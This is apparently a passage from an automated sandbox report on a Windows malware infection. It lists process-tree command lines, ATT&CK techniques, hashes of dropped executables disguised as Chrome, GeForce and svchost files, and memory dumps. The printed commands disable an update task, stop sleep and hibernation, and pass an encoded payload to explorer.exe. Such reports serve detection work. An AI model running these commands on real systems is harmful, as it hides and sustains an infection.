      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      4⤵
      PID:388220
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    3⤵
    PID:384896
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      PID:385244
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      PID:385412
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      PID:385484
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      PID:385508
- - C:\Windows\System32\conhost.exe
    C:\Windows\System32\conhost.exe "czellrako"
    3⤵
    PID:385388
- - C:\Windows\explorer.exe
    C:\Windows\explorer.exe jeqriwesihy0 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUXlyRZJXfJ5jiUwUr70AdCyDrkXUCGxfaV7s5kUsZ+M1jVBG7HUoq3EW6fYKxH5NP4M/tJ5/ZYtZM8EaX7F4M1t4UqpeucUZmwfkmLZunjXCsSyauoBJ4rCG2oWXgj+Mz1zn2/P6IvUiafyirYGJKq8C8Iyup27uke/hMzGar6avUzI4/Z1ZzYHHRT2ftkfrbrs42vCUVG1IbR8ZRcBC7Ao1zzvE5vXpY+VDlFfWGw15+M4nLexWOgOQVDDXZHeBpBgCj/w14IFN+FCTB6Al2NU86G5mCiX/+Uva7D8nJ2J1qLfiLlgpq/TvEYsAmX13t7wFi8BmicCdeYIniJ5DuJ7/iSaAZjUWWsZcGrXkQ2q/DfFYSw7GJUOukQkwOn40Ov8Ppyj+EQMrqmv3xPWDgiT5i5hP9N3bTWIlcHomC2uF2fR+my2wEys4OMviDWX52ANyfC7G7+Ud0EwdkbDAR64ybIsjuTmWts7p3aJRnhA27Lsuardo/7QJSF8ruzlRPbaWiNFLjOBolT+POpzyDSTxa3PWNfNB0QoyyNsg2goUHznkS33VEQSKMJUoZCIarJvcPMNQhStPuWbYNkeFVD8M6caD0NBWw3sazM2UjOhU=
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:385580

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
4.1MB

MD5
d80a837c05b2d5e7a01a88c4c0b732c2

SHA1
b8f19db24542d475a6c1fe6df7af90e5c8695e9a

SHA256
471028f0fac064ea991379d4302b219750884fed5564be404eeca4824c5825a8

SHA512
fed76343ef08d4e9eb496c2b77c3f949a5868ce1a76ace0ec9116d8b22ad7eb3e12ed704fbb8de8f742e20d954e0bdc0bc51553be7f1d6522b9d58ce84db3632

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
4.1MB

MD5
d80a837c05b2d5e7a01a88c4c0b732c2

SHA1
b8f19db24542d475a6c1fe6df7af90e5c8695e9a

SHA256
471028f0fac064ea991379d4302b219750884fed5564be404eeca4824c5825a8

SHA512
fed76343ef08d4e9eb496c2b77c3f949a5868ce1a76ace0ec9116d8b22ad7eb3e12ed704fbb8de8f742e20d954e0bdc0bc51553be7f1d6522b9d58ce84db3632

Download Submit
C:\ProgramData\GeForce\Lib\COM Surrogate.exe

Filesize
4.9MB

MD5
73b3415f513dd2718229b7ba87defee8

SHA1
fadd7a2619bee020339ca90ea65ba31eb3e8714f

SHA256
8fffbbfcd9ecea90252eed7fb2426c07e801eceb3eccfa660de98789b5cf423c

SHA512
7a6a791b14a8eade61c3d645e66acdef015ef515d4a7325b3eba1d0db22ae5b759651a86650b27c5162dbf7d7167cc4e229ceb079eae96b68a3fed48b0a8eb03

Download Submit
C:\ProgramData\GeForce\Lib\COM Surrogate.exe

Filesize
4.9MB

MD5
73b3415f513dd2718229b7ba87defee8

SHA1
fadd7a2619bee020339ca90ea65ba31eb3e8714f

SHA256
8fffbbfcd9ecea90252eed7fb2426c07e801eceb3eccfa660de98789b5cf423c

SHA512
7a6a791b14a8eade61c3d645e66acdef015ef515d4a7325b3eba1d0db22ae5b759651a86650b27c5162dbf7d7167cc4e229ceb079eae96b68a3fed48b0a8eb03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\Setup.exe.log

Filesize
408B

MD5
ada7572a2723a67c8537985d082dacc9

SHA1
2900cc8a1cac3a9cbef8d46d5fa6b7e2d485a306

SHA256
e82e82cdd6eda8461b3b727059294b0a21f56218d854b72d3918b68232b60e7d

SHA512
1c65643d6f2f0f559fd3e1072c12a126a5fea4203fa6903fd7e59420d8899fa4ada3eb241b7e19e0b748e78259f9296aa89a16a5bbf21cf84d4fc6e40fec08db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

Filesize
2KB

MD5
9f5ba20038047ea3e65846c20b0bc84b

SHA1
7962f08cc260e8ae4111b89df9a612058116d221

SHA256
7430899d039f35e12faabbc432a201a1799ba1a0b0e6cfbb743c61d5e755b2c3

SHA512
de57f18abcbdd56d9db835ca8d52c18daf29f1c24004aa616f2c219c359bc562a2d246a52ba7f8cd0c07a0756f259e2156fe408eb9d40d42e722148f1b14d989

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
278320da3eb8c8584b80c41e8c4b397a

SHA1
162a3c750448c45b1e7a4507b4e0bd14774568ef

SHA256
0bffa9a857a1e9e9b5f877284c8072892b818d72da6bcd94341bdbc4a1f58ed9

SHA512
7c908c277be92d48e19e85e412ab4e69d4a11ee07b04b56f9162d2ceac44d5ecce8291a932492d3996ed47b9a526ff14881a276d0d80fd1bfec3ea24fddf1de2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
278320da3eb8c8584b80c41e8c4b397a

SHA1
162a3c750448c45b1e7a4507b4e0bd14774568ef

SHA256
0bffa9a857a1e9e9b5f877284c8072892b818d72da6bcd94341bdbc4a1f58ed9

SHA512
7c908c277be92d48e19e85e412ab4e69d4a11ee07b04b56f9162d2ceac44d5ecce8291a932492d3996ed47b9a526ff14881a276d0d80fd1bfec3ea24fddf1de2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
61abd7189c239fbbc5349879e604484f

SHA1
3692fa81970b341caa50c2066e70c98f93ee21bb

SHA256
40db4595dae642c2e54e2aec148dd6c7eec8a3c703c7b0aeb3b9520b8ba210ca

SHA512
c913c91ee93d185c2994ad66b6aaa368dd37e9b5d58f53ca06f3661ae2be24897c5d93e9d487de744d3cbc1954356d67a8bc9afd54ae64609fd916fd9b140098

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.exe

Filesize
111KB

MD5
dab5342d0d566bc7d80e1cc11459912e

SHA1
7cd1a45da9458278571b13f08b28f607093e1225

SHA256
fa6ed407a949b1da6c2123ef67ef53280c4bb02bde373c62cad3ae228b5a4dd1

SHA512
0ccb2bc126d3a9e4af8cc022d93db95a9b542beb488bc23f55ade60cf7a5437657a9a0095cb4b8f56408fb75eddcb8d80a1c7ba2e658a889c57762d8d3f77d72

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.exe

Filesize
111KB

MD5
dab5342d0d566bc7d80e1cc11459912e

SHA1
7cd1a45da9458278571b13f08b28f607093e1225

SHA256
fa6ed407a949b1da6c2123ef67ef53280c4bb02bde373c62cad3ae228b5a4dd1

SHA512
0ccb2bc126d3a9e4af8cc022d93db95a9b542beb488bc23f55ade60cf7a5437657a9a0095cb4b8f56408fb75eddcb8d80a1c7ba2e658a889c57762d8d3f77d72

Download Submit
C:\Users\Admin\AppData\Local\Temp\10.exe

Filesize
413KB

MD5
5998150187408a1d1da9090a8cbf4a6d

SHA1
d764bab45313e96d050c43c2c476d28baa2c1eaf

SHA256
8fb31b017a281212c5246fd1aad185548aee1ada35574b3758439d8921f24626

SHA512
83540bc89b1ac0d2ce1423e675c8781f326fb9fc9188e5545ba13ba52d8e376a98e6768b5f349e6df481745426c6cf62ead4d2aee5ea280634faaeedf4ca60cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\10.exe

Filesize
413KB

MD5
5998150187408a1d1da9090a8cbf4a6d

SHA1
d764bab45313e96d050c43c2c476d28baa2c1eaf

SHA256
8fb31b017a281212c5246fd1aad185548aee1ada35574b3758439d8921f24626

SHA512
83540bc89b1ac0d2ce1423e675c8781f326fb9fc9188e5545ba13ba52d8e376a98e6768b5f349e6df481745426c6cf62ead4d2aee5ea280634faaeedf4ca60cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\11.exe

Filesize
1.4MB

MD5
00854e47bc6249cefca953ddc3f20f48

SHA1
fbec3af2ab8c29e660c86ecbf5d1c0ca7a33163d

SHA256
981b59093b5e83b9956e1a191e763352ba8f270cc2e73fe1b0b172139469a1fa

SHA512
1ed70afc8d7b4cc4c12c1a6e7935363caf939b4621ed26397d03eac56d8ef572dda71f3760bd84ece02f9c06f8435c330cf5dad950b56ff4f789a9eafa1ae119

Download Submit
C:\Users\Admin\AppData\Local\Temp\11.exe

Filesize
1.4MB

MD5
00854e47bc6249cefca953ddc3f20f48

SHA1
fbec3af2ab8c29e660c86ecbf5d1c0ca7a33163d

SHA256
981b59093b5e83b9956e1a191e763352ba8f270cc2e73fe1b0b172139469a1fa

SHA512
1ed70afc8d7b4cc4c12c1a6e7935363caf939b4621ed26397d03eac56d8ef572dda71f3760bd84ece02f9c06f8435c330cf5dad950b56ff4f789a9eafa1ae119

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.exe

Filesize
1.4MB

MD5
9bda451a29ccd4791cf8ac5c240e8048

SHA1
7ecded8397484e5b4cfcad8fdbe167bb1af2b11f

SHA256
a7f3ec78e6e5b53b6b8206074895b5832649c64f07bb1b55c3a1c2c9144a7635

SHA512
acda727d50b14932cacdfd476d98ba93426f681331d910ea9df97458c6d4d2848bee669b1e62f1476e94050447e1b7d9b62e6542f5ed511f91b0516e62fe880c

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.exe

Filesize
1.4MB

MD5
9bda451a29ccd4791cf8ac5c240e8048

SHA1
7ecded8397484e5b4cfcad8fdbe167bb1af2b11f

SHA256
a7f3ec78e6e5b53b6b8206074895b5832649c64f07bb1b55c3a1c2c9144a7635

SHA512
acda727d50b14932cacdfd476d98ba93426f681331d910ea9df97458c6d4d2848bee669b1e62f1476e94050447e1b7d9b62e6542f5ed511f91b0516e62fe880c

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.exe

Filesize
4.9MB

MD5
43e86612f2667d3df11c97c2aacadc97

SHA1
6e3b37c580840dd44444b249941e98fd1b49852c

SHA256
d66ac4afb7574c2ee7f6a824b9b2f8eb505a2dcc00cb6790863493b6d1568591

SHA512
0479701ee351e11af34c816ab514715219660de59f9e7f37a264417b1e968896f5eef8cac4463586eb9b4994d245791cb7edf901f463f2165b8f1320930e1df0

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.exe

Filesize
4.9MB

MD5
43e86612f2667d3df11c97c2aacadc97

SHA1
6e3b37c580840dd44444b249941e98fd1b49852c

SHA256
d66ac4afb7574c2ee7f6a824b9b2f8eb505a2dcc00cb6790863493b6d1568591

SHA512
0479701ee351e11af34c816ab514715219660de59f9e7f37a264417b1e968896f5eef8cac4463586eb9b4994d245791cb7edf901f463f2165b8f1320930e1df0

Download Submit
C:\Users\Admin\AppData\Local\Temp\5.exe

Filesize
95KB

MD5
af8a3a1cb685f9e1fdcc970bd4ca420f

SHA1
9342d6f660df293516c2932c905fe4411474e321

SHA256
39d7aead40f62566713de4ad6f430c06973fda6da972748f982a3d75f23715a9

SHA512
04864f3c6d4447694d4d4e4d5722302b13a41827d33fd3390fdc2e2c5f3dc8169bab0781099c79f0cb7b6af6d0b4870a3b226ab92ef37b62cca0aa86e00f4186

Download Submit
C:\Users\Admin\AppData\Local\Temp\5.exe

Filesize
95KB

MD5
af8a3a1cb685f9e1fdcc970bd4ca420f

SHA1
9342d6f660df293516c2932c905fe4411474e321

SHA256
39d7aead40f62566713de4ad6f430c06973fda6da972748f982a3d75f23715a9

SHA512
04864f3c6d4447694d4d4e4d5722302b13a41827d33fd3390fdc2e2c5f3dc8169bab0781099c79f0cb7b6af6d0b4870a3b226ab92ef37b62cca0aa86e00f4186

Download Submit
C:\Users\Admin\AppData\Local\Temp\6.exe

Filesize
4.1MB

MD5
d80a837c05b2d5e7a01a88c4c0b732c2

SHA1
b8f19db24542d475a6c1fe6df7af90e5c8695e9a

SHA256
471028f0fac064ea991379d4302b219750884fed5564be404eeca4824c5825a8

SHA512
fed76343ef08d4e9eb496c2b77c3f949a5868ce1a76ace0ec9116d8b22ad7eb3e12ed704fbb8de8f742e20d954e0bdc0bc51553be7f1d6522b9d58ce84db3632

Download Submit
C:\Users\Admin\AppData\Local\Temp\6.exe

Filesize
4.1MB

MD5
d80a837c05b2d5e7a01a88c4c0b732c2

SHA1
b8f19db24542d475a6c1fe6df7af90e5c8695e9a

SHA256
471028f0fac064ea991379d4302b219750884fed5564be404eeca4824c5825a8

SHA512
fed76343ef08d4e9eb496c2b77c3f949a5868ce1a76ace0ec9116d8b22ad7eb3e12ed704fbb8de8f742e20d954e0bdc0bc51553be7f1d6522b9d58ce84db3632

Download Submit
C:\Users\Admin\AppData\Local\Temp\7.exe

Filesize
2.4MB

MD5
7612d86c7e4b0d6624a1387da41c18ee

SHA1
aef37933ce24a135f0f84d09351b852f09ea1e58

SHA256
761466bbd912ee25f7303102c251f50955f15535758becdee8f4afed1eb358cb

SHA512
e2fe5f95b691c5923eb3413cda4f3bdc9712f1962ca232a1a765f98d21bcc86d4a2fe56cc40841f989ec981e7c68aeba0ed3fa9c151d5f15403a54befbc9cfa0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7.exe

Filesize
2.4MB

MD5
7612d86c7e4b0d6624a1387da41c18ee

SHA1
aef37933ce24a135f0f84d09351b852f09ea1e58

SHA256
761466bbd912ee25f7303102c251f50955f15535758becdee8f4afed1eb358cb

SHA512
e2fe5f95b691c5923eb3413cda4f3bdc9712f1962ca232a1a765f98d21bcc86d4a2fe56cc40841f989ec981e7c68aeba0ed3fa9c151d5f15403a54befbc9cfa0

Download Submit
C:\Users\Admin\AppData\Local\Temp\8.exe

Filesize
367KB

MD5
50e064b49ae012894a53fe30dac655d6

SHA1
19181a85a5d89d32cd8716b15b9160336168d273

SHA256
fac1c9a5d8f1c7999b69ba9746762cf8ce45c4bb961d1e973a657bbf4751bbb0

SHA512
4c766a3f4ab7e6a3d5d161ecc8d5e78183a3abf377ca3e7b27efba68a384be1b8a32c61f1ed0ca2333e90d1b9aa43224aeb9e4aa13fe813c00a58f380623a8ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\8.exe

Filesize
367KB

MD5
50e064b49ae012894a53fe30dac655d6

SHA1
19181a85a5d89d32cd8716b15b9160336168d273

SHA256
fac1c9a5d8f1c7999b69ba9746762cf8ce45c4bb961d1e973a657bbf4751bbb0

SHA512
4c766a3f4ab7e6a3d5d161ecc8d5e78183a3abf377ca3e7b27efba68a384be1b8a32c61f1ed0ca2333e90d1b9aa43224aeb9e4aa13fe813c00a58f380623a8ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\9.exe

Filesize
2.5MB

MD5
6cabeda725dedf18f07565dd8ce222fd

SHA1
e42cc2c0cf55c603f322677b5008da0e9752d30e

SHA256
7a6559eaa68cba0fdc1f101ab6c294e5c4205a6134fd9bb442eef2a49d700bbf

SHA512
2050ae6204b8adaae332a678fc866c2638b1f08a6d7e72301aa6306164c415bfacf7f9b8cd93f532c3901b58a51c554c3a90039dfd839ad5994dca1e2e18c947

Download Submit
C:\Users\Admin\AppData\Local\Temp\9.exe

Filesize
2.5MB

MD5
6cabeda725dedf18f07565dd8ce222fd

SHA1
e42cc2c0cf55c603f322677b5008da0e9752d30e

SHA256
7a6559eaa68cba0fdc1f101ab6c294e5c4205a6134fd9bb442eef2a49d700bbf

SHA512
2050ae6204b8adaae332a678fc866c2638b1f08a6d7e72301aa6306164c415bfacf7f9b8cd93f532c3901b58a51c554c3a90039dfd839ad5994dca1e2e18c947

Download Submit
C:\Users\Admin\AppData\Local\Temp\SLAYER Leecher v0.7 .exe

Filesize
6.6MB

MD5
aa0b6211f5245f25392b74fdbab048eb

SHA1
05c37446aca08847a2688257d0fb138f560b4db2

SHA256
74cb827e0324e02bae1b2632b624ff84bd4bd54b796bb046fa27f557ca8f8674

SHA512
97e44da681f5b7db132cd37b1a6305f45d5ec546a23ae3f55f8a8cd214e5c76d22947d12a844767c88fc1844f297f7ce7a85569859286b3b5816144979d05176

Download Submit
C:\Users\Admin\AppData\Local\Temp\SLAYER Leecher v0.7 .exe

Filesize
6.6MB

MD5
aa0b6211f5245f25392b74fdbab048eb

SHA1
05c37446aca08847a2688257d0fb138f560b4db2

SHA256
74cb827e0324e02bae1b2632b624ff84bd4bd54b796bb046fa27f557ca8f8674

SHA512
97e44da681f5b7db132cd37b1a6305f45d5ec546a23ae3f55f8a8cd214e5c76d22947d12a844767c88fc1844f297f7ce7a85569859286b3b5816144979d05176

Download Submit
C:\Users\Admin\AppData\Local\Temp\Setup.exe

Filesize
460KB

MD5
dc3253da7448ba2a2e62a20b45e14217

SHA1
5341b88dde807c9412b43631bb55d3890d499dce

SHA256
0d347b51123738a7c9c654da232bb07e7cc542dba9006123009fc46bc5386230

SHA512
547050db96aab0a8ee826de752174f98e2e9bbd3782a6cff1584491aac9ba7ace83bc214af65b12032a0aa390b90c4fb18607945631ffa71d9567cdd75adbdbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Setup.exe

Filesize
460KB

MD5
dc3253da7448ba2a2e62a20b45e14217

SHA1
5341b88dde807c9412b43631bb55d3890d499dce

SHA256
0d347b51123738a7c9c654da232bb07e7cc542dba9006123009fc46bc5386230

SHA512
547050db96aab0a8ee826de752174f98e2e9bbd3782a6cff1584491aac9ba7ace83bc214af65b12032a0aa390b90c4fb18607945631ffa71d9567cdd75adbdbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Setup.exe

Filesize
460KB

MD5
dc3253da7448ba2a2e62a20b45e14217

SHA1
5341b88dde807c9412b43631bb55d3890d499dce

SHA256
0d347b51123738a7c9c654da232bb07e7cc542dba9006123009fc46bc5386230

SHA512
547050db96aab0a8ee826de752174f98e2e9bbd3782a6cff1584491aac9ba7ace83bc214af65b12032a0aa390b90c4fb18607945631ffa71d9567cdd75adbdbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\start.exe

Filesize
4.0MB

MD5
47b29465bb5fcbbd899f1d98af193f06

SHA1
ddd7c01b07939751f734c1e9b7aa17853447e02c

SHA256
a54ac89930406913a3b0b3b8e3ef738135a9b7fa54b01578f870e26ee9f99efb

SHA512
838a170802283f318712195402dc26dc601d2f81d3dae1f32309e532af732808c1a8b03c80f7dcf99b2ae94276678bb4211a44ebe889335da34a6083c4bd31f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\start.exe

Filesize
4.0MB

MD5
47b29465bb5fcbbd899f1d98af193f06

SHA1
ddd7c01b07939751f734c1e9b7aa17853447e02c

SHA256
a54ac89930406913a3b0b3b8e3ef738135a9b7fa54b01578f870e26ee9f99efb

SHA512
838a170802283f318712195402dc26dc601d2f81d3dae1f32309e532af732808c1a8b03c80f7dcf99b2ae94276678bb4211a44ebe889335da34a6083c4bd31f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF8F6.tmp.bat

Filesize
159B

MD5
89c212636a85bee217e2f23ff369aaa0

SHA1
9620cfc140b5fe8fb6f7317dabad37c93fb191a5

SHA256
b08d9b901b1bc3bf47f830ee301b7220172f5303d94f188710ca2d259f365f6e

SHA512
d32fa8d5e06f69b1f7378c88892501820ed5f6b6bd38e0f90264b993bda58bb8cdc069529e832b8b922dd2ff281d60510f05b20a7250245cb7b26aea081b4bea

Download Submit
C:\Users\Admin\AppData\Local\Temp\v0.7.exe

Filesize
7.1MB

MD5
4fb5fe2d1c634048f57951fac1119c70

SHA1
ac212f208ea3e99e868f2846ece0ac5bfc5f1ad0

SHA256
c3196cefb0a5baa235a5ce3205f13650d80d918e5c5b44850dbf6bf87dd42f7b

SHA512
0582955b826945d6a6b971192b7560bacc514dc8adee493cb93a6634285d8cf011ca9a8d4d987cff2c2543d91331fbce451f488cb97f52d99264207d5dc667aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\v0.7.exe

Filesize
7.1MB

MD5
4fb5fe2d1c634048f57951fac1119c70

SHA1
ac212f208ea3e99e868f2846ece0ac5bfc5f1ad0

SHA256
c3196cefb0a5baa235a5ce3205f13650d80d918e5c5b44850dbf6bf87dd42f7b

SHA512
0582955b826945d6a6b971192b7560bacc514dc8adee493cb93a6634285d8cf011ca9a8d4d987cff2c2543d91331fbce451f488cb97f52d99264207d5dc667aa

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe

Filesize
256KB

MD5
c1bec073b2d31b556844f1262599ec85

SHA1
f80b9f3fe02985fd8c75c3c035b914bcffce856c

SHA256
5d676e15188a787df2ea89ae5a541882a82353e54561149bf61a9783044657df

SHA512
c2bc51169ad908bb5cc318afabc00ba2c9b443ca3ebd841fee06e60bf197a982b6e542e98025a8f2da7267f8519642ec4bbb9ab278591f60e5b4b50ebdea694b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe

Filesize
256KB

MD5
c1bec073b2d31b556844f1262599ec85

SHA1
f80b9f3fe02985fd8c75c3c035b914bcffce856c

SHA256
5d676e15188a787df2ea89ae5a541882a82353e54561149bf61a9783044657df

SHA512
c2bc51169ad908bb5cc318afabc00ba2c9b443ca3ebd841fee06e60bf197a982b6e542e98025a8f2da7267f8519642ec4bbb9ab278591f60e5b4b50ebdea694b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe

Filesize
321KB

MD5
6b02b44666eb8e6c83834fb346fe8668

SHA1
b787a7c2735b114765c30d0e837683da60569da7

SHA256
83120c98dd6e47442d1867df29e6edf968e7752e5809b7d4ec1d09c0069530e2

SHA512
e7c4054615cb0ddfef2141b55ef7167e4de5807786d66b092ebe4806d4ac04f83746bb9d93f3e556e3655d44edf6b0ac6b311c87f7fc0c7a5ce33af5b139b82d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe

Filesize
321KB

MD5
6b02b44666eb8e6c83834fb346fe8668

SHA1
b787a7c2735b114765c30d0e837683da60569da7

SHA256
83120c98dd6e47442d1867df29e6edf968e7752e5809b7d4ec1d09c0069530e2

SHA512
e7c4054615cb0ddfef2141b55ef7167e4de5807786d66b092ebe4806d4ac04f83746bb9d93f3e556e3655d44edf6b0ac6b311c87f7fc0c7a5ce33af5b139b82d

Download Submit
C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe

Filesize
111KB

MD5
dab5342d0d566bc7d80e1cc11459912e

SHA1
7cd1a45da9458278571b13f08b28f607093e1225

SHA256
fa6ed407a949b1da6c2123ef67ef53280c4bb02bde373c62cad3ae228b5a4dd1

SHA512
0ccb2bc126d3a9e4af8cc022d93db95a9b542beb488bc23f55ade60cf7a5437657a9a0095cb4b8f56408fb75eddcb8d80a1c7ba2e658a889c57762d8d3f77d72

Download Submit
C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe

Filesize
111KB

MD5
dab5342d0d566bc7d80e1cc11459912e

SHA1
7cd1a45da9458278571b13f08b28f607093e1225

SHA256
fa6ed407a949b1da6c2123ef67ef53280c4bb02bde373c62cad3ae228b5a4dd1

SHA512
0ccb2bc126d3a9e4af8cc022d93db95a9b542beb488bc23f55ade60cf7a5437657a9a0095cb4b8f56408fb75eddcb8d80a1c7ba2e658a889c57762d8d3f77d72

Download Submit
C:\Users\Admin\AppData\Roaming\WindosCert.exe

Filesize
95KB

MD5
af8a3a1cb685f9e1fdcc970bd4ca420f

SHA1
9342d6f660df293516c2932c905fe4411474e321

SHA256
39d7aead40f62566713de4ad6f430c06973fda6da972748f982a3d75f23715a9

SHA512
04864f3c6d4447694d4d4e4d5722302b13a41827d33fd3390fdc2e2c5f3dc8169bab0781099c79f0cb7b6af6d0b4870a3b226ab92ef37b62cca0aa86e00f4186

Download Submit
C:\Users\Admin\AppData\Roaming\WindosCert.exe

Filesize
95KB

MD5
af8a3a1cb685f9e1fdcc970bd4ca420f

SHA1
9342d6f660df293516c2932c905fe4411474e321

SHA256
39d7aead40f62566713de4ad6f430c06973fda6da972748f982a3d75f23715a9

SHA512
04864f3c6d4447694d4d4e4d5722302b13a41827d33fd3390fdc2e2c5f3dc8169bab0781099c79f0cb7b6af6d0b4870a3b226ab92ef37b62cca0aa86e00f4186

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
5d574dc518025fad52b7886c1bff0e13

SHA1
68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7

SHA256
755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2

SHA512
21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e2d46bffd1d9300639cac360fac02cb4

SHA1
fd2b4813c8ab610294b6759192ca05bad5bb8958

SHA256
94ffe575e92d3bab6173fd7eca207088c8b374de79d93dddf45101048c0bead3

SHA512
54b1ea5f5bb1d8a402fbb5ab8f0d7bec9aa47cb48a4c411ee8032648a97efe466d9d8e7f87c5ac288e994eeb47e034eac94bb3631955f9ba2270d687e7620535

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
c5227366b7a688ff23b01788718251aa

SHA1
9795262e79c832ba49c744fcd1b1794c0ffb5c6a

SHA256
789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48

SHA512
8b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe

Download Submit
memory/1520-201-0x0000000000720000-0x0000000000B3E000-memory.dmp

Filesize
4.1MB

Download
memory/2096-1164-0x00000000099D0000-0x00000000099D8000-memory.dmp

Filesize
32KB

Download
memory/2096-458-0x0000000008460000-0x00000000087B0000-memory.dmp

Filesize
3.3MB

Download
memory/2096-172-0x00000000776D0000-0x000000007785E000-memory.dmp

Filesize
1.6MB

Download
memory/2096-1159-0x0000000009A20000-0x0000000009A3A000-memory.dmp

Filesize
104KB

Download
memory/2096-454-0x00000000082E0000-0x0000000008346000-memory.dmp

Filesize
408KB

Download
memory/2096-817-0x0000000009F00000-0x0000000009F94000-memory.dmp

Filesize
592KB

Download
memory/2096-792-0x0000000009DB0000-0x0000000009E55000-memory.dmp

Filesize
660KB

Download
memory/2096-760-0x0000000009860000-0x000000000987E000-memory.dmp

Filesize
120KB

Download
memory/2096-756-0x00000000099E0000-0x0000000009A13000-memory.dmp

Filesize
204KB

Download
memory/2096-452-0x0000000008360000-0x00000000083C6000-memory.dmp

Filesize
408KB

Download
memory/2096-582-0x0000000008B40000-0x0000000008BB6000-memory.dmp

Filesize
472KB

Download
memory/2096-168-0x00000000776D0000-0x000000007785E000-memory.dmp

Filesize
1.6MB

Download
memory/2096-554-0x00000000083D0000-0x000000000841B000-memory.dmp

Filesize
300KB

Download
memory/2096-542-0x0000000008160000-0x000000000817C000-memory.dmp

Filesize
112KB

Download
memory/2096-165-0x00000000776D0000-0x000000007785E000-memory.dmp

Filesize
1.6MB

Download
memory/2096-438-0x0000000008050000-0x0000000008072000-memory.dmp

Filesize
136KB

Download
memory/2096-392-0x0000000007970000-0x0000000007F98000-memory.dmp

Filesize
6.2MB

Download
memory/2096-368-0x0000000005290000-0x00000000052C6000-memory.dmp

Filesize
216KB

Download
memory/2096-166-0x00000000776D0000-0x000000007785E000-memory.dmp

Filesize
1.6MB

Download
memory/2636-131-0x00000000776D0000-0x000000007785E000-memory.dmp

Filesize
